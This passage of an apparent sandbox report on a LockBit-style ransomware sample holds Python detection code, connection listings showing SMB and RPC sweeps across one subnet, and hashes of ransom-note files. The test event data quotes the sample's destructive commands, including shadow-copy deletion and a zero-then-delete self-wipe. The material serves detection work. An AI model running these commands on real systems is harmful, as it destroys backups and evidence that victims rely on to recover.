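                    f' & fsutil file setZeroData offset=0 length=524288 "{SAMPLE_PATH}"'
                    f' & Del /f /q "{SAMPLE_PATH}"'},
    {"EventID": 1, "Image": r"C:\Windows\system32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\Admin\Desktop\notes.txt"},  # benign control
]
SRC = "10.127.0.77"  # assumed address of the detonating host; the report does not state it
NET_EVENTS = (
    [{"EventID": 3, "SourceIp": SRC, "DestinationIp": f"10.127.0.{i}", "DestinationPort": 445} for i in range(1, 60)]
    + [{"EventID": 3, "SourceIp": SRC, "DestinationIp": f"10.127.0.{i}", "DestinationPort": 135} for i in range(9, 40)]
    + [{"EventID": 3, "SourceIp": SRC, "DestinationIp": "13.107.21.237", "DestinationPort": 443}]
)


def classify_process_event(evt):
    """Return (tag, detail) findings for one process-create event."""
    cl = evt.get("CommandLine", "")
    findings = [(tag, evt["Image"]) for tag, pat in RECOVERY_INHIBITION.items() if pat.search(cl)]
    zero, delete = ZERO_DATA.search(cl), DEL_FILE.search(cl)
    # Only a zero-then-delete of the *same* path counts; either alone is routine admin noise.
    if zero and delete and zero.group("path").strip().lower() == delete.group("path").strip().lower():
        findings.append(("self_wipe", zero.group("path").strip()))
    return findings


def find_port_sweeps(net_events, ports=(445, 135), min_targets=20):
    """Return {(source, port): distinct_hosts} for sources reaching >= min_targets hosts on a port."""
    targets = defaultdict(set)
    for e in net_events:
        port = int(e["DestinationPort"])
        if port in ports:
            targets[(e["SourceIp"], port)].add(e["DestinationIp"])
    return {k: len(v) for k, v in targets.items() if len(v) >= min_targets}


def run_detection(process_events=PROCESS_EVENTS, net_events=NET_EVENTS):
    """Run both detectors; findings are keyed by event index so a rule can cite the record."""
    hits = {i: classify_process_event(e) for i, e in enumerate(process_events)}
    return {"process_findings": {i: f for i, f in hits.items() if f},
            "port_sweeps": find_port_sweeps(net_events)}


if __name__ == "__main__":
    result = run_detection()
    for i, f in result["process_findings"].items():
        print(f"event {i}: {f}")
    print(result["port_sweeps"])
```

The parent cmd.exe record alone yields all five recovery-inhibition tags, so the rule fires before the child vssadmin/wmic/bcdedit/wbadmin processes are even logged; the separate child record still produces its own finding for environments that only capture leaf processes. vssadmin and wbadmin do run during legitimate backup maintenance, so in production the parent image (here an executable under %TEMP%) should be part of the condition, whereas the bcdedit pair that disables recovery and hides boot failures has almost no benign use. The sweep threshold of 20 distinct hosts is an assumption; tune it to the size of the subnet and the host's normal SMB fan-out.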

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.9:135 tcp
N/A 10.127.0.10:135 tcp
N/A 10.127.0.11:135 tcp
N/A 10.127.0.12:135 tcp
N/A 10.127.0.13:135 tcp
N/A 10.127.0.14:135 tcp
N/A 10.127.0.15:135 tcp
N/A 10.127.0.16:135 tcp
N/A 10.127.0.17:135 tcp
N/A 10.127.0.19:135 tcp
N/A 10.127.0.18:135 tcp
N/A 10.127.0.20:135 tcp
N/A 10.127.0.21:135 tcp
N/A 10.127.0.22:135 tcp
N/A 10.127.0.23:135 tcp
N/A 10.127.0.24:135 tcp
N/A 10.127.0.25:135 tcp
N/A 10.127.0.26:135 tcp
N/A 10.127.0.27:135 tcp
N/A 10.127.0.28:135 tcp
N/A 10.127.0.29:135 tcp
N/A 10.127.0.30:135 tcp
N/A 10.127.0.31:135 tcp
N/A 10.127.0.32:135 tcp
N/A 10.127.0.33:135 tcp
N/A 10.127.0.34:135 tcp
N/A 10.127.0.35:135 tcp
N/A 10.127.0.36:135 tcp
N/A 10.127.0.37:135 tcp
N/A 10.127.0.38:135 tcp
N/A 10.127.0.39:135 tcp
N/A 10.127.0.40:135 tcp
N/A 10.127.0.41:135 tcp
N/A 10.127.0.42:135 tcp
N/A 10.127.0.43:135 tcp
N/A 10.127.0.44:135 tcp
N/A 10.127.0.45:135 tcp
N/A 10.127.0.46:135 tcp
N/A 10.127.0.47:135 tcp
N/A 10.127.0.48:135 tcp
N/A 10.127.0.49:135 tcp
N/A 10.127.0.50:135 tcp
N/A 10.127.0.51:135 tcp
N/A 10.127.0.52:135 tcp
N/A 10.127.0.53:135 tcp
N/A 10.127.0.54:135 tcp
N/A 10.127.0.55:135 tcp
N/A 10.127.0.56:135 tcp
N/A 10.127.0.57:135 tcp
N/A 10.127.0.58:135 tcp
N/A 10.127.0.59:135 tcp
N/A 10.127.0.60:135 tcp
N/A 10.127.0.61:135 tcp
N/A 10.127.0.62:135 tcp
N/A 10.127.0.63:135 tcp
N/A 10.127.0.64:135 tcp
N/A 10.127.0.65:135 tcp
N/A 10.127.0.66:135 tcp
N/A 10.127.0.67:135 tcp
N/A 10.127.0.68:135 tcp
N/A 10.127.0.69:135 tcp
N/A 10.127.0.70:135 tcp
N/A 10.127.0.71:135 tcp
N/A 10.127.0.72:135 tcp
N/A 10.127.0.73:135 tcp
N/A 10.127.0.74:135 tcp
N/A 10.127.0.75:135 tcp
N/A 10.127.0.76:135 tcp
N/A 10.127.0.77:135 tcp
N/A 10.127.0.78:135 tcp
N/A 10.127.0.79:135 tcp
N/A 10.127.0.80:135 tcp
N/A 10.127.0.81:135 tcp
N/A 10.127.0.82:135 tcp
N/A 10.127.0.83:135 tcp
N/A 10.127.0.84:135 tcp
N/A 10.127.0.85:135 tcp
N/A 10.127.0.86:135 tcp
N/A 10.127.0.87:135 tcp
N/A 10.127.0.88:135 tcp
N/A 10.127.0.89:135 tcp
N/A 10.127.0.90:135 tcp
N/A 10.127.0.91:135 tcp
N/A 10.127.0.92:135 tcp
N/A 10.127.0.93:135 tcp
N/A 10.127.0.94:135 tcp
N/A 10.127.0.95:135 tcp
N/A 10.127.0.96:135 tcp
N/A 10.127.0.97:135 tcp
N/A 10.127.0.98:135 tcp
N/A 10.127.0.99:135 tcp
N/A 10.127.0.100:135 tcp
N/A 10.127.0.101:135 tcp
N/A 10.127.0.102:135 tcp
N/A 10.127.0.103:135 tcp
N/A 10.127.0.104:135 tcp
N/A 10.127.0.105:135 tcp
N/A 10.127.0.122:135 tcp
N/A 10.127.0.106:135 tcp
N/A 10.127.0.123:135 tcp
N/A 10.127.0.107:135 tcp
N/A 10.127.0.124:135 tcp
N/A 10.127.0.108:135 tcp
N/A 10.127.0.125:135 tcp
N/A 10.127.0.109:135 tcp
N/A 10.127.0.126:135 tcp
N/A 10.127.0.127:135 tcp
N/A 10.127.0.111:135 tcp
N/A 10.127.0.128:135 tcp
N/A 10.127.0.112:135 tcp
N/A 10.127.0.129:135 tcp
N/A 10.127.0.113:135 tcp
N/A 10.127.0.110:135 tcp
N/A 10.127.0.114:135 tcp
N/A 10.127.0.131:135 tcp
N/A 10.127.0.130:135 tcp
N/A 10.127.0.132:135 tcp
N/A 10.127.0.136:135 tcp
N/A 10.127.0.116:135 tcp
N/A 10.127.0.133:135 tcp
N/A 10.127.0.117:135 tcp
N/A 10.127.0.134:135 tcp
N/A 10.127.0.118:135 tcp
N/A 10.127.0.135:135 tcp
N/A 10.127.0.119:135 tcp
N/A 10.127.0.193:135 tcp
N/A 10.127.0.251:135 tcp
N/A 10.127.0.250:135 tcp
N/A 10.127.0.249:135 tcp
N/A 10.127.0.248:135 tcp
N/A 10.127.0.247:135 tcp
N/A 10.127.0.246:135 tcp
N/A 10.127.0.245:135 tcp
N/A 10.127.0.244:135 tcp
N/A 10.127.0.243:135 tcp
N/A 10.127.0.115:135 tcp
N/A 10.127.0.241:135 tcp
N/A 10.127.0.240:135 tcp
N/A 10.127.0.239:135 tcp
N/A 10.127.0.238:135 tcp
N/A 10.127.0.237:135 tcp
N/A 10.127.0.236:135 tcp
N/A 10.127.0.235:135 tcp
N/A 10.127.0.234:135 tcp
N/A 10.127.0.233:135 tcp
N/A 10.127.0.232:135 tcp
N/A 10.127.0.229:135 tcp
N/A 10.127.0.230:135 tcp
N/A 10.127.0.228:135 tcp
N/A 10.127.0.227:135 tcp
N/A 10.127.0.226:135 tcp
N/A 10.127.0.225:135 tcp
N/A 10.127.0.224:135 tcp
N/A 10.127.0.223:135 tcp
N/A 10.127.0.222:135 tcp
N/A 10.127.0.221:135 tcp
N/A 10.127.0.220:135 tcp
N/A 10.127.0.242:135 tcp
N/A 10.127.0.218:135 tcp
N/A 10.127.0.219:135 tcp
N/A 10.127.0.217:135 tcp
N/A 10.127.0.215:135 tcp
N/A 10.127.0.216:135 tcp
N/A 10.127.0.214:135 tcp
N/A 10.127.0.212:135 tcp
N/A 10.127.0.213:135 tcp
N/A 10.127.0.211:135 tcp
N/A 10.127.0.210:135 tcp
N/A 10.127.0.209:135 tcp
N/A 10.127.0.208:135 tcp
N/A 10.127.0.206:135 tcp
N/A 10.127.0.205:135 tcp
N/A 10.127.0.204:135 tcp
N/A 10.127.0.203:135 tcp
N/A 10.127.0.202:135 tcp
N/A 10.127.0.201:135 tcp
N/A 10.127.0.200:135 tcp
N/A 10.127.0.199:135 tcp
N/A 10.127.0.198:135 tcp
N/A 10.127.0.195:135 tcp
N/A 10.127.0.197:135 tcp
N/A 10.127.0.196:135 tcp
N/A 10.127.0.194:135 tcp
N/A 10.127.0.192:135 tcp
N/A 10.127.0.191:135 tcp
N/A 10.127.0.190:135 tcp
N/A 10.127.0.189:135 tcp
N/A 10.127.0.188:135 tcp
N/A 10.127.0.187:135 tcp
N/A 10.127.0.186:135 tcp
N/A 10.127.0.185:135 tcp
N/A 10.127.0.184:135 tcp
N/A 10.127.0.183:135 tcp
N/A 10.127.0.182:135 tcp
N/A 10.127.0.181:135 tcp
N/A 10.127.0.180:135 tcp
N/A 10.127.0.179:135 tcp
N/A 10.127.0.178:135 tcp
N/A 10.127.0.177:135 tcp
N/A 10.127.0.176:135 tcp
N/A 10.127.0.175:135 tcp
N/A 10.127.0.174:135 tcp
N/A 10.127.0.173:135 tcp
N/A 10.127.0.172:135 tcp
N/A 10.127.0.207:135 tcp
N/A 10.127.0.170:135 tcp
N/A 10.127.0.169:135 tcp
N/A 10.127.0.168:135 tcp
N/A 10.127.0.167:135 tcp
N/A 10.127.0.166:135 tcp
N/A 10.127.0.165:135 tcp
N/A 10.127.0.164:135 tcp
N/A 10.127.0.163:135 tcp
N/A 10.127.0.162:135 tcp
N/A 10.127.0.161:135 tcp
N/A 10.127.0.160:135 tcp
N/A 10.127.0.159:135 tcp
N/A 10.127.0.158:135 tcp
N/A 10.127.0.157:135 tcp
N/A 10.127.0.156:135 tcp
N/A 10.127.0.155:135 tcp
N/A 10.127.0.154:135 tcp
N/A 10.127.0.153:135 tcp
N/A 10.127.0.152:135 tcp
N/A 10.127.0.151:135 tcp
N/A 10.127.0.150:135 tcp
N/A 10.127.0.149:135 tcp
N/A 10.127.0.148:135 tcp
N/A 10.127.0.147:135 tcp
N/A 10.127.0.146:135 tcp
N/A 10.127.0.145:135 tcp
N/A 10.127.0.144:135 tcp
N/A 10.127.0.171:135 tcp
N/A 10.127.0.143:135 tcp
N/A 10.127.0.142:135 tcp
N/A 10.127.0.141:135 tcp
N/A 10.127.0.140:135 tcp
N/A 10.127.0.139:135 tcp
N/A 10.127.0.138:135 tcp
N/A 10.127.0.121:135 tcp
N/A 10.127.0.137:135 tcp
N/A 10.127.0.120:135 tcp
N/A 10.127.0.8:135 tcp
N/A 10.127.0.7:135 tcp
N/A 10.127.0.6:135 tcp
N/A 10.127.0.5:135 tcp
N/A 10.127.0.4:135 tcp
N/A 10.127.0.3:135 tcp
N/A 10.127.0.2:135 tcp
N/A 10.127.0.0:135 tcp
N/A 10.127.0.1:135 tcp
N/A 10.127.0.252:135 tcp
N/A 10.127.0.254:135 tcp
N/A 10.127.0.253:135 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp
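The rows above show the sample opening tcp/445 (SMB) and tcp/135 (MS-RPC endpoint mapper) to every address in 10.127.0.0/24, a full-subnet host sweep consistent with network discovery ahead of spreading to other machines, followed by PTR lookups to 8.8.8.8 for a handful of public addresses. The following Python is an added example, not part of the report or the sandbox's output: it parses rows in this listing's format, groups TCP destinations per port and /24, and flags a sweep when one sample touches many distinct hosts. The row regex, the `min_hosts` threshold and the embedded subset of rows are the editor's own assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: a subset of the rows from this report's Network listing
# (the full listing covers every host in 10.127.0.0/24 on 445 and 135).
SAMPLE_ROWS = """\
N/A 10.127.0.28:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.9:135 tcp
N/A 10.127.0.10:135 tcp
N/A 10.127.0.11:135 tcp
N/A 10.127.0.12:135 tcp
N/A 10.127.0.13:135 tcp
N/A 10.127.0.14:135 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
"""

# Assumed row layout: <country> <ip>:<port> [<domain>] <proto>
ROW_RE = re.compile(
    r"^(?P<country>\S+)\s+(?P<ip>[0-9.]+):(?P<port>\d+)"
    r"(?:\s+(?P<domain>\S+))?\s+(?P<proto>tcp|udp)$"
)

# Ports whose subnet-wide sweep indicates SMB/RPC host discovery
SWEEP_PORTS = {445: "SMB", 135: "MS-RPC endpoint mapper"}


def parse_rows(text):
    """Turn listing lines into dicts; lines that are not connection rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        rows.append({
            "country": m["country"],
            "ip": ipaddress.ip_address(m["ip"]),
            "port": int(m["port"]),
            "domain": m["domain"],
            "proto": m["proto"],
        })
    return rows


def find_sweeps(rows, min_hosts=5, prefix=24):
    """Group TCP destinations by (port, /prefix network) and report every group
    in which the sample contacted at least `min_hosts` distinct hosts."""
    hosts = defaultdict(set)
    for r in rows:
        if r["proto"] != "tcp" or r["port"] not in SWEEP_PORTS:
            continue
        net = ipaddress.ip_network(f"{r['ip']}/{prefix}", strict=False)
        hosts[(r["port"], net)].add(r["ip"])
    findings = []
    for (port, net), ips in sorted(hosts.items()):
        if len(ips) >= min_hosts:
            findings.append({
                "port": port,
                "service": SWEEP_PORTS[port],
                "network": str(net),
                "distinct_hosts": len(ips),
                "private": net.is_private,
            })
    return findings


def ptr_lookups(rows):
    """Decode the public IPs the sample reverse-resolved: the in-addr.arpa
    names in the DNS rows carry the address with its octets reversed."""
    out = []
    for r in rows:
        d = r["domain"]
        if r["port"] == 53 and d and d.endswith(".in-addr.arpa"):
            octets = d[: -len(".in-addr.arpa")].split(".")
            out.append(".".join(reversed(octets)))
    return out


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for f in find_sweeps(rows):
        print(f"{f['service']} sweep: {f['distinct_hosts']} hosts in "
              f"{f['network']} (tcp/{f['port']}, private={f['private']})")
    print("PTR lookups for:", ", ".join(ptr_lookups(rows)))
```

On the full listing the same grouping yields one group per port covering all 256 addresses of 10.127.0.0/24, which is the signal worth alerting on: a single process fanning out to an entire subnet on 445 and 135 is rarely legitimate outside vulnerability scanners and inventory tools, so a detection on host-level connection telemetry can use the distinct-host count per port and subnet rather than any signature of the binary itself.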

Files

C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Restore-My-Files.txt

MD5 799161fca9a3167f25cc591922e9d4bf
SHA1 578a60791842ac09f171a72b6cc2997b8307b4a1
SHA256 6ebba29a420264342daf19a0d5d1dd36ecd56f5082b1d74d95733bc210ec75df
SHA512 0b23abb807fc49f995a0d3a8bce125770ad6b2cb9395e2d5317bdce394fddd165e1779c7434c91e479996f6caad88e6179bb13ac406aacc236b882cbc0381bb6

C:\Users\Admin\Desktop\LockBit-note.hta

MD5 1ab66d44b4dfadff2a914174e24c8cf2
SHA1 99214f760f492208095d8091d4b874df871858e5
SHA256 fc17dec8009c6af6add2a03807cc1ad8b08c2f34a0bff4922ecce9cba85de62e
SHA512 fbb46563c2b84e1e36980a818ddae1341f899e6d6159216c45b9be37da558b633b4f1243d0f9665434f31dd5b7a2e5d062a50506b7a5be57897ede5c85077e88